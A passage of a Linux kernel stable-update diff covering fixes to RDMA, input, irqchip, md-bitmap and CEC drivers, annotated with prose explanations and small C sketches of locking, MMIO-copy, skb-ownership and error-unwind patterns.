++	xa_erase_irq(&srq_table->xa, srq->srqn);
+ err_put:
+ 	hns_roce_table_put(hr_dev, &srq_table->table, srq->srqn);
+ 
+@@ -153,7 +153,7 @@ static void free_srqc(struct hns_roce_dev *hr_dev, struct hns_roce_srq *srq)
+ 		dev_err(hr_dev->dev, "DESTROY_SRQ failed (%d) for SRQN %06lx\n",
+ 			ret, srq->srqn);
+ 
+-	xa_erase(&srq_table->xa, srq->srqn);
++	xa_erase_irq(&srq_table->xa, srq->srqn);
+ 
+ 	if (refcount_dec_and_test(&srq->refcount))
+ 		complete(&srq->free);
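
The SRQ table is also looked up from the interrupt path when asynchronous events arrive, so the process-context writers above must disable interrupts while holding xa_lock; plain xa_store()/xa_erase() would let that handler interrupt the lock holder and deadlock. A minimal sketch of the pairing, with hypothetical table/object names:

#include <linux/gfp.h>
#include <linux/xarray.h>

static int table_insert(struct xarray *table, unsigned long id, void *obj)
{
	/* xa_store_irq() takes xa_lock with IRQs off, so an interrupt
	 * handler touching the same array cannot deadlock against us.
	 */
	return xa_err(xa_store_irq(table, id, obj, GFP_KERNEL));
}

static void table_remove(struct xarray *table, unsigned long id)
{
	xa_erase_irq(table, id);	/* must match the _irq store above */
}
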
+diff --git a/drivers/infiniband/hw/mlx5/mem.c b/drivers/infiniband/hw/mlx5/mem.c
+index 96ffbbaf0a73d..5a22be14d958f 100644
+--- a/drivers/infiniband/hw/mlx5/mem.c
++++ b/drivers/infiniband/hw/mlx5/mem.c
+@@ -30,6 +30,7 @@
+  * SOFTWARE.
+  */
+ 
++#include <linux/io.h>
+ #include <rdma/ib_umem_odp.h>
+ #include "mlx5_ib.h"
+ #include <linux/jiffies.h>
+@@ -108,7 +109,6 @@ static int post_send_nop(struct mlx5_ib_dev *dev, struct ib_qp *ibqp, u64 wr_id,
+ 	__be32 mmio_wqe[16] = {};
+ 	unsigned long flags;
+ 	unsigned int idx;
+-	int i;
+ 
+ 	if (unlikely(dev->mdev->state == MLX5_DEVICE_STATE_INTERNAL_ERROR))
+ 		return -EIO;
+@@ -148,10 +148,8 @@ static int post_send_nop(struct mlx5_ib_dev *dev, struct ib_qp *ibqp, u64 wr_id,
+ 	 * we hit doorbell
+ 	 */
+ 	wmb();
+-	for (i = 0; i < 8; i++)
+-		mlx5_write64(&mmio_wqe[i * 2],
+-			     bf->bfreg->map + bf->offset + i * 8);
+-	io_stop_wc();
++	__iowrite64_copy(bf->bfreg->map + bf->offset, mmio_wqe,
++			 sizeof(mmio_wqe) / 8);
+ 
+ 	bf->offset ^= bf->buf_size;
+ 
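
__iowrite64_copy() replaces the open-coded mlx5_write64() loop: it moves the buffer to MMIO in 64-bit chunks, and its count argument is in 8-byte units, so sizeof(mmio_wqe) / 8 covers the whole 64-byte entry. A sketch of the call shape, assuming a mapped doorbell region (bf_map and bf_offset are hypothetical):

#include <linux/io.h>

static void ring_doorbell(void __iomem *bf_map, unsigned int bf_offset,
			  const __be32 wqe[16])
{
	/* Descriptor writes must be visible before the doorbell. */
	wmb();

	/* 16 x 4 bytes = 64 bytes = 8 count units of 8 bytes each. */
	__iowrite64_copy(bf_map + bf_offset, wqe, sizeof(__be32[16]) / 8);
}
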
+diff --git a/drivers/infiniband/hw/mlx5/mr.c b/drivers/infiniband/hw/mlx5/mr.c
+index 410cc5fd25239..b81b03aa2a629 100644
+--- a/drivers/infiniband/hw/mlx5/mr.c
++++ b/drivers/infiniband/hw/mlx5/mr.c
+@@ -1349,7 +1349,8 @@ static bool can_use_umr_rereg_access(struct mlx5_ib_dev *dev,
+ 	unsigned int diffs = current_access_flags ^ target_access_flags;
+ 
+ 	if (diffs & ~(IB_ACCESS_LOCAL_WRITE | IB_ACCESS_REMOTE_WRITE |
+-		      IB_ACCESS_REMOTE_READ | IB_ACCESS_RELAXED_ORDERING))
++		      IB_ACCESS_REMOTE_READ | IB_ACCESS_RELAXED_ORDERING |
++		      IB_ACCESS_REMOTE_ATOMIC))
+ 		return false;
+ 	return mlx5r_umr_can_reconfig(dev, current_access_flags,
+ 				      target_access_flags);
+diff --git a/drivers/infiniband/sw/rxe/rxe_comp.c b/drivers/infiniband/sw/rxe/rxe_comp.c
+index d2a2501236174..c238fa61815aa 100644
+--- a/drivers/infiniband/sw/rxe/rxe_comp.c
++++ b/drivers/infiniband/sw/rxe/rxe_comp.c
+@@ -126,12 +126,12 @@ void rxe_comp_queue_pkt(struct rxe_qp *qp, struct sk_buff *skb)
+ {
+ 	int must_sched;
+ 
+-	skb_queue_tail(&qp->resp_pkts, skb);
+-
+-	must_sched = skb_queue_len(&qp->resp_pkts) > 1;
++	must_sched = skb_queue_len(&qp->resp_pkts) > 0;
+ 	if (must_sched != 0)
+ 		rxe_counter_inc(SKB_TO_PKT(skb)->rxe, RXE_CNT_COMPLETER_SCHED);
+ 
++	skb_queue_tail(&qp->resp_pkts, skb);
++
+ 	if (must_sched)
+ 		rxe_sched_task(&qp->comp.task);
+ 	else
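
The reorder above matters because skb_queue_tail() hands the skb to the completer task, which may run and free it immediately; the old code still dereferenced the skb (via SKB_TO_PKT()) after enqueueing, and checking skb_queue_len() > 0 before the enqueue is equivalent to the old > 1 check after it. The safe shape is to finish every access first, then publish:

#include <linux/skbuff.h>

/* Sketch: `deferred` is a hypothetical stats counter. */
static void hand_off(struct sk_buff_head *q, struct sk_buff *skb,
		     atomic_t *deferred)
{
	bool busy = skb_queue_len(q) > 0;	/* consumer already has work */

	if (busy)
		atomic_inc(deferred);		/* still safe: skb is ours */

	skb_queue_tail(q, skb);			/* ownership transfers here */
	/* Do not touch skb past this point. */
}
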
+diff --git a/drivers/infiniband/sw/rxe/rxe_net.c b/drivers/infiniband/sw/rxe/rxe_net.c
+index 719432808a063..779cd547ce839 100644
+--- a/drivers/infiniband/sw/rxe/rxe_net.c
++++ b/drivers/infiniband/sw/rxe/rxe_net.c
+@@ -20,9 +20,10 @@
+ 
+ static struct rxe_recv_sockets recv_sockets;
+ 
+-static struct dst_entry *rxe_find_route4(struct net_device *ndev,
+-				  struct in_addr *saddr,
+-				  struct in_addr *daddr)
++static struct dst_entry *rxe_find_route4(struct rxe_qp *qp,
++					 struct net_device *ndev,
++					 struct in_addr *saddr,
++					 struct in_addr *daddr)
+ {
+ 	struct rtable *rt;
+ 	struct flowi4 fl = { { 0 } };
+@@ -35,7 +36,7 @@ static struct dst_entry *rxe_find_route4(struct net_device *ndev,
+ 
+ 	rt = ip_route_output_key(&init_net, &fl);
+ 	if (IS_ERR(rt)) {
+-		pr_err_ratelimited("no route to %pI4\n", &daddr->s_addr);
++		rxe_dbg_qp(qp, "no route to %pI4\n", &daddr->s_addr);
+ 		return NULL;
+ 	}
+ 
+@@ -43,7 +44,8 @@ static struct dst_entry *rxe_find_route4(struct net_device *ndev,
+ }
+ 
+ #if IS_ENABLED(CONFIG_IPV6)
+-static struct dst_entry *rxe_find_route6(struct net_device *ndev,
++static struct dst_entry *rxe_find_route6(struct rxe_qp *qp,
++					 struct net_device *ndev,
+ 					 struct in6_addr *saddr,
+ 					 struct in6_addr *daddr)
+ {
+@@ -60,12 +62,12 @@ static struct dst_entry *rxe_find_route6(struct net_device *ndev,
+ 					       recv_sockets.sk6->sk, &fl6,
+ 					       NULL);
+ 	if (IS_ERR(ndst)) {
+-		pr_err_ratelimited("no route to %pI6\n", daddr);
++		rxe_dbg_qp(qp, "no route to %pI6\n", daddr);
+ 		return NULL;
+ 	}
+ 
+ 	if (unlikely(ndst->error)) {
+-		pr_err("no route to %pI6\n", daddr);
++		rxe_dbg_qp(qp, "no route to %pI6\n", daddr);
+ 		goto put;
+ 	}
+ 
+@@ -77,7 +79,8 @@ static struct dst_entry *rxe_find_route6(struct net_device *ndev,
+ 
+ #else
+ 
+-static struct dst_entry *rxe_find_route6(struct net_device *ndev,
++static struct dst_entry *rxe_find_route6(struct rxe_qp *qp,
++					 struct net_device *ndev,
+ 					 struct in6_addr *saddr,
+ 					 struct in6_addr *daddr)
+ {
+@@ -105,14 +108,14 @@ static struct dst_entry *rxe_find_route(struct net_device *ndev,
+ 
+ 			saddr = &av->sgid_addr._sockaddr_in.sin_addr;
+ 			daddr = &av->dgid_addr._sockaddr_in.sin_addr;
+-			dst = rxe_find_route4(ndev, saddr, daddr);
++			dst = rxe_find_route4(qp, ndev, saddr, daddr);
+ 		} else if (av->network_type == RXE_NETWORK_TYPE_IPV6) {
+ 			struct in6_addr *saddr6;
+ 			struct in6_addr *daddr6;
+ 
+ 			saddr6 = &av->sgid_addr._sockaddr_in6.sin6_addr;
+ 			daddr6 = &av->dgid_addr._sockaddr_in6.sin6_addr;
+-			dst = rxe_find_route6(ndev, saddr6, daddr6);
++			dst = rxe_find_route6(qp, ndev, saddr6, daddr6);
+ #if IS_ENABLED(CONFIG_IPV6)
+ 			if (dst)
+ 				qp->dst_cookie =
+@@ -285,7 +288,7 @@ static int prepare4(struct rxe_av *av, struct rxe_pkt_info *pkt,
+ 
+ 	dst = rxe_find_route(skb->dev, qp, av);
+ 	if (!dst) {
+-		pr_err("Host not reachable\n");
++		rxe_dbg_qp(qp, "Host not reachable\n");
+ 		return -EHOSTUNREACH;
+ 	}
+ 
+@@ -309,7 +312,7 @@ static int prepare6(struct rxe_av *av, struct rxe_pkt_info *pkt,
+ 
+ 	dst = rxe_find_route(skb->dev, qp, av);
+ 	if (!dst) {
+-		pr_err("Host not reachable\n");
++		rxe_dbg_qp(qp, "Host not reachable\n");
+ 		return -EHOSTUNREACH;
+ 	}
+ 
+@@ -363,20 +366,13 @@ static int rxe_send(struct sk_buff *skb, struct rxe_pkt_info *pkt)
+ 	rxe_get(pkt->qp);
+ 	atomic_inc(&pkt->qp->skb_out);
+ 
+-	if (skb->protocol == htons(ETH_P_IP)) {
++	if (skb->protocol == htons(ETH_P_IP))
+ 		err = ip_local_out(dev_net(skb_dst(skb)->dev), skb->sk, skb);
+-	} else if (skb->protocol == htons(ETH_P_IPV6)) {
++	else
+ 		err = ip6_local_out(dev_net(skb_dst(skb)->dev), skb->sk, skb);
+-	} else {
+-		pr_err("Unknown layer 3 protocol: %d\n", skb->protocol);
+-		atomic_dec(&pkt->qp->skb_out);
+-		rxe_put(pkt->qp);
+-		kfree_skb(skb);
+-		return -EINVAL;
+-	}
+ 
+ 	if (unlikely(net_xmit_eval(err))) {
+-		pr_debug("error sending packet: %d\n", err);
++		rxe_dbg_qp(pkt->qp, "error sending packet: %d\n", err);
+ 		return -EAGAIN;
+ 	}
+ 
+@@ -417,7 +413,7 @@ int rxe_xmit_packet(struct rxe_qp *qp, struct rxe_pkt_info *pkt,
+ 
+ 	if ((is_request && (qp->req.state != QP_STATE_READY)) ||
+ 	    (!is_request && (qp->resp.state != QP_STATE_READY))) {
+-		pr_info("Packet dropped. QP is not in ready state\n");
++		rxe_dbg_qp(qp, "Packet dropped. QP is not in ready state\n");
+ 		goto drop;
+ 	}
+ 
+@@ -598,7 +594,7 @@ static int rxe_notify(struct notifier_block *not_blk,
+ 		rxe_port_down(rxe);
+ 		break;
+ 	case NETDEV_CHANGEMTU:
+-		pr_info("%s changed mtu to %d\n", ndev->name, ndev->mtu);
++		rxe_dbg(rxe, "%s changed mtu to %d\n", ndev->name, ndev->mtu);
+ 		rxe_set_mtu(rxe, ndev->mtu);
+ 		break;
+ 	case NETDEV_CHANGE:
+@@ -610,7 +606,7 @@ static int rxe_notify(struct notifier_block *not_blk,
+ 	case NETDEV_CHANGENAME:
+ 	case NETDEV_FEAT_CHANGE:
+ 	default:
+-		pr_info("ignoring netdev event = %ld for %s\n",
++		rxe_dbg(rxe, "ignoring netdev event = %ld for %s\n",
+ 			event, ndev->name);
+ 		break;
+ 	}
+diff --git a/drivers/infiniband/ulp/ipoib/ipoib_vlan.c b/drivers/infiniband/ulp/ipoib/ipoib_vlan.c
+index 4bd161e86f8dd..562df2b3ef187 100644
+--- a/drivers/infiniband/ulp/ipoib/ipoib_vlan.c
++++ b/drivers/infiniband/ulp/ipoib/ipoib_vlan.c
+@@ -184,8 +184,12 @@ int ipoib_vlan_add(struct net_device *pdev, unsigned short pkey)
+ 
+ 	ppriv = ipoib_priv(pdev);
+ 
+-	snprintf(intf_name, sizeof(intf_name), "%s.%04x",
+-		 ppriv->dev->name, pkey);
++	/* If you increase IFNAMSIZ, update snprintf below
++	 * to allow longer names.
++	 */
++	BUILD_BUG_ON(IFNAMSIZ != 16);
++	snprintf(intf_name, sizeof(intf_name), "%.10s.%04x", ppriv->dev->name,
++		 pkey);
+ 
+ 	ndev = ipoib_intf_alloc(ppriv->ca, ppriv->port, intf_name);
+ 	if (IS_ERR(ndev)) {
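
The arithmetic behind the new format string: with IFNAMSIZ == 16, "%.10s" caps the parent name at 10 bytes, leaving 1 for '.', 4 for the %04x pkey and 1 for the NUL terminator, and 10 + 1 + 4 + 1 = 16, so the name can never be silently truncated; the BUILD_BUG_ON pins that assumption at compile time. In isolation:

#include <linux/build_bug.h>
#include <linux/netdevice.h>	/* IFNAMSIZ */

static void child_name(char out[IFNAMSIZ], const char *parent, u16 pkey)
{
	BUILD_BUG_ON(IFNAMSIZ != 16);	/* revisit the widths if this grows */
	snprintf(out, IFNAMSIZ, "%.10s.%04x", parent, pkey);
}
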
+diff --git a/drivers/input/misc/ims-pcu.c b/drivers/input/misc/ims-pcu.c
+index b2f1292e27ef7..180d90e46061e 100644
+--- a/drivers/input/misc/ims-pcu.c
++++ b/drivers/input/misc/ims-pcu.c
+@@ -42,8 +42,8 @@ struct ims_pcu_backlight {
+ #define IMS_PCU_PART_NUMBER_LEN		15
+ #define IMS_PCU_SERIAL_NUMBER_LEN	8
+ #define IMS_PCU_DOM_LEN			8
+-#define IMS_PCU_FW_VERSION_LEN		(9 + 1)
+-#define IMS_PCU_BL_VERSION_LEN		(9 + 1)
++#define IMS_PCU_FW_VERSION_LEN		16
++#define IMS_PCU_BL_VERSION_LEN		16
+ #define IMS_PCU_BL_RESET_REASON_LEN	(2 + 1)
+ 
+ #define IMS_PCU_PCU_B_DEVICE_ID		5
+diff --git a/drivers/input/misc/pm8xxx-vibrator.c b/drivers/input/misc/pm8xxx-vibrator.c
+index 53ad25eaf1a28..8bfe5c7b1244c 100644
+--- a/drivers/input/misc/pm8xxx-vibrator.c
++++ b/drivers/input/misc/pm8xxx-vibrator.c
+@@ -14,7 +14,8 @@
+ 
+ #define VIB_MAX_LEVEL_mV	(3100)
+ #define VIB_MIN_LEVEL_mV	(1200)
+-#define VIB_MAX_LEVELS		(VIB_MAX_LEVEL_mV - VIB_MIN_LEVEL_mV)
++#define VIB_PER_STEP_mV		(100)
++#define VIB_MAX_LEVELS		(VIB_MAX_LEVEL_mV - VIB_MIN_LEVEL_mV + VIB_PER_STEP_mV)
+ 
+ #define MAX_FF_SPEED		0xff
+ 
+@@ -118,10 +119,10 @@ static void pm8xxx_work_handler(struct work_struct *work)
+ 		vib->active = true;
+ 		vib->level = ((VIB_MAX_LEVELS * vib->speed) / MAX_FF_SPEED) +
+ 						VIB_MIN_LEVEL_mV;
+-		vib->level /= 100;
++		vib->level /= VIB_PER_STEP_mV;
+ 	} else {
+ 		vib->active = false;
+-		vib->level = VIB_MIN_LEVEL_mV / 100;
++		vib->level = VIB_MIN_LEVEL_mV / VIB_PER_STEP_mV;
+ 	}
+ 
+ 	pm8xxx_vib_set(vib, vib->active);
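
With VIB_PER_STEP_mV factored out, the driver computes the drive level in millivolts first and converts to register steps only at the end. A standalone demonstration of the integer math (userspace, for illustration only; the constants are the driver's):

#include <stdio.h>

#define VIB_MAX_LEVEL_mV  3100
#define VIB_MIN_LEVEL_mV  1200
#define VIB_PER_STEP_mV    100
#define VIB_MAX_LEVELS    (VIB_MAX_LEVEL_mV - VIB_MIN_LEVEL_mV + VIB_PER_STEP_mV)
#define MAX_FF_SPEED      0xff

int main(void)
{
	for (int speed = 0; speed <= MAX_FF_SPEED; speed += 85) {
		int mv = (VIB_MAX_LEVELS * speed) / MAX_FF_SPEED
			 + VIB_MIN_LEVEL_mV;		/* millivolts */
		printf("speed %3d -> %4d mV -> level %d\n",
		       speed, mv, mv / VIB_PER_STEP_mV);
	}
	return 0;
}
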
+diff --git a/drivers/input/mouse/cyapa.c b/drivers/input/mouse/cyapa.c
+index 77cc653edca22..e401934df4642 100644
+--- a/drivers/input/mouse/cyapa.c
++++ b/drivers/input/mouse/cyapa.c
+@@ -1357,10 +1357,16 @@ static int __maybe_unused cyapa_suspend(struct device *dev)
+ 	u8 power_mode;
+ 	int error;
+ 
+-	error = mutex_lock_interruptible(&cyapa->state_sync_lock);
++	error = mutex_lock_interruptible(&cyapa->input->mutex);
+ 	if (error)
+ 		return error;
+ 
++	error = mutex_lock_interruptible(&cyapa->state_sync_lock);
++	if (error) {
++		mutex_unlock(&cyapa->input->mutex);
++		return error;
++	}
++
+ 	/*
+ 	 * Runtime PM is enable only when device is in operational mode and
+ 	 * users in use, so need check it before disable it to
+@@ -1395,6 +1401,8 @@ static int __maybe_unused cyapa_suspend(struct device *dev)
+ 		cyapa->irq_wake = (enable_irq_wake(client->irq) == 0);
+ 
+ 	mutex_unlock(&cyapa->state_sync_lock);
++	mutex_unlock(&cyapa->input->mutex);
++
+ 	return 0;
+ }
+ 
+@@ -1404,6 +1412,7 @@ static int __maybe_unused cyapa_resume(struct device *dev)
+ 	struct cyapa *cyapa = i2c_get_clientdata(client);
+ 	int error;
+ 
++	mutex_lock(&cyapa->input->mutex);
+ 	mutex_lock(&cyapa->state_sync_lock);
+ 
+ 	if (device_may_wakeup(dev) && cyapa->irq_wake) {
+@@ -1422,6 +1431,7 @@ static int __maybe_unused cyapa_resume(struct device *dev)
+ 	enable_irq(client->irq);
+ 
+ 	mutex_unlock(&cyapa->state_sync_lock);
++	mutex_unlock(&cyapa->input->mutex);
+ 	return 0;
+ }
+ 
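
Both suspend and resume now take the input device's mutex before state_sync_lock and drop them in reverse order; keeping a single global order between the two locks is what rules out an AB-BA deadlock against paths that already hold the input mutex. The interruptible variant with unwind, in isolation:

#include <linux/mutex.h>

static int lock_both(struct mutex *outer, struct mutex *inner)
{
	int error;

	error = mutex_lock_interruptible(outer);
	if (error)
		return error;			/* signal before outer */

	error = mutex_lock_interruptible(inner);
	if (error)
		mutex_unlock(outer);		/* never exit holding outer */

	return error;
}
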
+diff --git a/drivers/input/serio/ioc3kbd.c b/drivers/input/serio/ioc3kbd.c
+index d51bfe912db5b..676b0bda3d720 100644
+--- a/drivers/input/serio/ioc3kbd.c
++++ b/drivers/input/serio/ioc3kbd.c
+@@ -190,7 +190,7 @@ static int ioc3kbd_probe(struct platform_device *pdev)
+ 	return 0;
+ }
+ 
+-static int ioc3kbd_remove(struct platform_device *pdev)
++static void ioc3kbd_remove(struct platform_device *pdev)
+ {
+ 	struct ioc3kbd_data *d = platform_get_drvdata(pdev);
+ 
+@@ -198,13 +198,18 @@ static int ioc3kbd_remove(struct platform_device *pdev)
+ 
+ 	serio_unregister_port(d->kbd);
+ 	serio_unregister_port(d->aux);
+-
+-	return 0;
+ }
+ 
++static const struct platform_device_id ioc3kbd_id_table[] = {
++	{ "ioc3-kbd", },
++	{ }
++};
++MODULE_DEVICE_TABLE(platform, ioc3kbd_id_table);
++
+ static struct platform_driver ioc3kbd_driver = {
+ 	.probe          = ioc3kbd_probe,
+-	.remove         = ioc3kbd_remove,
++	.remove_new     = ioc3kbd_remove,
++	.id_table	= ioc3kbd_id_table,
+ 	.driver = {
+ 		.name = "ioc3-kbd",
+ 	},
+diff --git a/drivers/interconnect/qcom/qcm2290.c b/drivers/interconnect/qcom/qcm2290.c
+index 82a2698ad66b1..ca7ad37ea6777 100644
+--- a/drivers/interconnect/qcom/qcm2290.c
++++ b/drivers/interconnect/qcom/qcm2290.c
+@@ -164,7 +164,7 @@ static struct qcom_icc_node mas_snoc_bimc = {
+ 	.name = "mas_snoc_bimc",
+ 	.buswidth = 16,
+ 	.qos.ap_owned = true,
+-	.qos.qos_port = 2,
++	.qos.qos_port = 6,
+ 	.qos.qos_mode = NOC_QOS_MODE_BYPASS,
+ 	.mas_rpm_id = 164,
+ 	.slv_rpm_id = -1,
+diff --git a/drivers/irqchip/irq-alpine-msi.c b/drivers/irqchip/irq-alpine-msi.c
+index fc1ef7de37973..c9ffd69dfc756 100644
+--- a/drivers/irqchip/irq-alpine-msi.c
++++ b/drivers/irqchip/irq-alpine-msi.c
+@@ -165,7 +165,7 @@ static int alpine_msix_middle_domain_alloc(struct irq_domain *domain,
+ 	return 0;
+ 
+ err_sgi:
+-	irq_domain_free_irqs_parent(domain, virq, i - 1);
++	irq_domain_free_irqs_parent(domain, virq, i);
+ 	alpine_msix_free_sgi(priv, sgi, nr_irqs);
+ 	return err;
+ }
+diff --git a/drivers/irqchip/irq-loongson-pch-msi.c b/drivers/irqchip/irq-loongson-pch-msi.c
+index a72ede90ffc69..8b642927b522b 100644
+--- a/drivers/irqchip/irq-loongson-pch-msi.c
++++ b/drivers/irqchip/irq-loongson-pch-msi.c
+@@ -136,7 +136,7 @@ static int pch_msi_middle_domain_alloc(struct irq_domain *domain,
+ 
+ err_hwirq:
+ 	pch_msi_free_hwirq(priv, hwirq, nr_irqs);
+-	irq_domain_free_irqs_parent(domain, virq, i - 1);
++	irq_domain_free_irqs_parent(domain, virq, i);
+ 
+ 	return err;
+ }
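
This is the same off-by-one fixed in irq-alpine-msi above: when the setup loop fails at index i, exactly i entries (indices 0..i-1) were allocated, and irq_domain_free_irqs_parent() takes a count, so the correct argument is i; passing i - 1 leaked the last successfully allocated interrupt. The generic shape, with hypothetical helpers:

struct ctx;
int setup_one(struct ctx *c, unsigned int i);
void teardown_first_n(struct ctx *c, unsigned int n);	/* frees indices 0..n-1 */

static int setup_all(struct ctx *c, unsigned int nr)
{
	unsigned int i;
	int err;

	for (i = 0; i < nr; i++) {
		err = setup_one(c, i);
		if (err) {
			teardown_first_n(c, i);	/* i succeeded, not i - 1 */
			return err;
		}
	}
	return 0;
}
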
+diff --git a/drivers/macintosh/via-macii.c b/drivers/macintosh/via-macii.c
+index db9270da5b8e9..b6ddf1d47cb4e 100644
+--- a/drivers/macintosh/via-macii.c
++++ b/drivers/macintosh/via-macii.c
+@@ -140,24 +140,19 @@ static int macii_probe(void)
+ /* Initialize the driver */
+ static int macii_init(void)
+ {
+-	unsigned long flags;
+ 	int err;
+ 
+-	local_irq_save(flags);
+-
+ 	err = macii_init_via();
+ 	if (err)
+-		goto out;
++		return err;
+ 
+ 	err = request_irq(IRQ_MAC_ADB, macii_interrupt, 0, "ADB",
+ 			  macii_interrupt);
+ 	if (err)
+-		goto out;
++		return err;
+ 
+ 	macii_state = idle;
+-out:
+-	local_irq_restore(flags);
+-	return err;
++	return 0;
+ }
+ 
+ /* initialize the hardware */
+diff --git a/drivers/md/md-bitmap.c b/drivers/md/md-bitmap.c
+index 5200bba63708e..9d8ac04c23462 100644
+--- a/drivers/md/md-bitmap.c
++++ b/drivers/md/md-bitmap.c
+@@ -1352,7 +1352,7 @@ __acquires(bitmap->lock)
+ 	sector_t chunk = offset >> bitmap->chunkshift;
+ 	unsigned long page = chunk >> PAGE_COUNTER_SHIFT;
+ 	unsigned long pageoff = (chunk & PAGE_COUNTER_MASK) << COUNTER_BYTE_SHIFT;
+-	sector_t csize;
++	sector_t csize = ((sector_t)1) << bitmap->chunkshift;
+ 	int err;
+ 
+ 	if (page >= bitmap->pages) {
+@@ -1361,6 +1361,7 @@ __acquires(bitmap->lock)
+ 		 * End-of-device while looking for a whole page or
+ 		 * user set a huge number to sysfs bitmap_set_bits.
+ 		 */
++		*blocks = csize - (offset & (csize - 1));
+ 		return NULL;
+ 	}
+ 	err = md_bitmap_checkpage(bitmap, page, create, 0);
+@@ -1369,8 +1370,7 @@ __acquires(bitmap->lock)
+ 	    bitmap->bp[page].map == NULL)
+ 		csize = ((sector_t)1) << (bitmap->chunkshift +
+ 					  PAGE_COUNTER_SHIFT);
+-	else
+-		csize = ((sector_t)1) << bitmap->chunkshift;
++
+ 	*blocks = csize - (offset & (csize - 1));
+ 
+ 	if (err < 0)
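
Callers of this lookup rely on *blocks to know how far to advance even when no counter page exists, so the fix initialises csize to one chunk up front and fills *blocks before the early NULL return; previously the out-parameter was left stale on that path. The chunk arithmetic, runnable in isolation:

#include <stdio.h>
#include <stdint.h>

/* Blocks remaining in the chunk containing `offset`, where the chunk
 * size csize = 1 << chunkshift is a power of two.
 */
static uint64_t blocks_left(uint64_t offset, unsigned int chunkshift)
{
	uint64_t csize = (uint64_t)1 << chunkshift;

	return csize - (offset & (csize - 1));
}

int main(void)
{
	/* 128-sector chunks: offset 130 is 2 sectors in, 126 remain. */
	printf("%llu\n", (unsigned long long)blocks_left(130, 7));
	return 0;
}
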
+diff --git a/drivers/media/cec/core/cec-adap.c b/drivers/media/cec/core/cec-adap.c
+index c761ac35e120d..a5e5f6a4af917 100644
+--- a/drivers/media/cec/core/cec-adap.c
++++ b/drivers/media/cec/core/cec-adap.c
+@@ -490,6 +490,15 @@ int cec_thread_func(void *_adap)
+ 			goto unlock;
+ 		}
+ 
++		if (adap->transmit_in_progress &&
++		    adap->transmit_in_progress_aborted) {
++			if (adap->transmitting)
++				cec_data_cancel(adap->transmitting,
++						CEC_TX_STATUS_ABORTED, 0);
++			adap->transmit_in_progress = false;
++			adap->transmit_in_progress_aborted = false;
++			goto unlock;
++		}
+ 		if (adap->transmit_in_progress && timeout) {
+ 			/*
+ 			 * If we timeout, then log that. Normally this does
+@@ -744,6 +753,7 @@ int cec_transmit_msg_fh(struct cec_adapter *adap, struct cec_msg *msg,
+ {
+ 	struct cec_data *data;
+ 	bool is_raw = msg_is_raw(msg);
++	int err;
+ 
+ 	if (adap->devnode.unregistered)
+ 		return -ENODEV;
+@@ -908,11 +918,13 @@ int cec_transmit_msg_fh(struct cec_adapter *adap, struct cec_msg *msg,
+ 	 * Release the lock and wait, retake the lock afterwards.
+ 	 */
+ 	mutex_unlock(&adap->lock);
+-	wait_for_completion_killable(&data->c);
+-	if (!data->completed)
+-		cancel_delayed_work_sync(&data->work);
++	err = wait_for_completion_killable(&data->c);
++	cancel_delayed_work_sync(&data->work);
+ 	mutex_lock(&adap->lock);
+ 
++	if (err)
++		adap->transmit_in_progress_aborted = true;
++
+ 	/* Cancel the transmit if it was interrupted */
+ 	if (!data->completed) {
+ 		if (data->msg.tx_status & CEC_TX_STATUS_OK)
+@@ -1545,9 +1557,12 @@ static int cec_config_thread_func(void *arg)
+  */
+ static void cec_claim_log_addrs(struct cec_adapter *adap, bool block)
+ {
+-	if (WARN_ON(adap->is_configuring || adap->is_configured))
++	if (WARN_ON(adap->is_claiming_log_addrs ||
++		    adap->is_configuring || adap->is_configured))
+ 		return;
+ 
++	adap->is_claiming_log_addrs = true;
++
+ 	init_completion(&adap->config_completion);
+ 
+ 	/* Ready to kick off the thread */
+@@ -1562,6 +1577,7 @@ static void cec_claim_log_addrs(struct cec_adapter *adap, bool block)
+ 		wait_for_completion(&adap->config_completion);
+ 		mutex_lock(&adap->lock);
+ 	}
++	adap->is_claiming_log_addrs = false;
+ }
+ 
+ /*
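
The transmit path now records whether the killable wait was interrupted and cancels the delayed work unconditionally; the completion can race with a fatal signal, and cancel_delayed_work_sync() is harmless when the work already ran but guarantees it is not still executing. The pattern in isolation, with a hypothetical request object:

#include <linux/completion.h>
#include <linux/workqueue.h>

struct req {				/* hypothetical */
	struct completion done;
	struct delayed_work work;
	bool aborted;
};

static int wait_for_req(struct req *r)
{
	int err;

	err = wait_for_completion_killable(&r->done);	/* 0 or -ERESTARTSYS */

	/* Always cancel: a no-op if the work already ran, and afterwards
	 * the timeout handler is guaranteed not to be running.
	 */
	cancel_delayed_work_sync(&r->work);

	if (err)
		r->aborted = true;	/* let the state machine clean up */

	return err;
}
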
+diff --git a/drivers/media/cec/core/cec-api.c b/drivers/media/cec/core/cec-api.c
+index 67dc79ef17050..3ef9153443044 100644
+--- a/drivers/media/cec/core/cec-api.c
++++ b/drivers/media/cec/core/cec-api.c
+@@ -178,7 +178,7 @@ static long cec_adap_s_log_addrs(struct cec_adapter *adap, struct cec_fh *fh,
+ 			   CEC_LOG_ADDRS_FL_ALLOW_RC_PASSTHRU |
+ 			   CEC_LOG_ADDRS_FL_CDC_ONLY;
+ 	mutex_lock(&adap->lock);
+-	if (!adap->is_configuring &&
++	if (!adap->is_claiming_log_addrs && !adap->is_configuring &&
+ 	    (!log_addrs.num_log_addrs || !adap->is_configured) &&
+ 	    !cec_is_busy(adap, fh)) {
+ 		err = __cec_s_log_addrs(adap, &log_addrs, block);
+@@ -664,6 +664,8 @@ static int cec_release(struct inode *inode, struct file *filp)
+ 		list_del_init(&data->xfer_list);
+ 	}
+ 	mutex_unlock(&adap->lock);
++
++	mutex_lock(&fh->lock);
+ 	while (!list_empty(&fh->msgs)) {
+ 		struct cec_msg_entry *entry =
+ 			list_first_entry(&fh->msgs, struct cec_msg_entry, list);
+@@ -681,6 +683,7 @@ static int cec_release(struct inode *inode, struct file *filp)
+ 			kfree(entry);
+ 		}
+ 	}
++	mutex_unlock(&fh->lock);
+ 	kfree(fh);
+ 
+ 	cec_put_device(devnode);
+diff --git a/drivers/media/pci/intel/ipu3/ipu3-cio2-main.c b/drivers/media/pci/intel/ipu3/ipu3-cio2-main.c
+index 1bbe58b24d99d..2ae7130880533 100644
+--- a/drivers/media/pci/intel/ipu3/ipu3-cio2-main.c
++++ b/drivers/media/pci/intel/ipu3/ipu3-cio2-main.c
+@@ -1798,11 +1798,6 @@ static int cio2_pci_probe(struct pci_dev *pci_dev,
+ 
+ 	v4l2_async_nf_init(&cio2->notifier);
+ 
+-	/* Register notifier for subdevices we care */
+-	r = cio2_parse_firmware(cio2);
+-	if (r)
+-		goto fail_clean_notifier;
+-
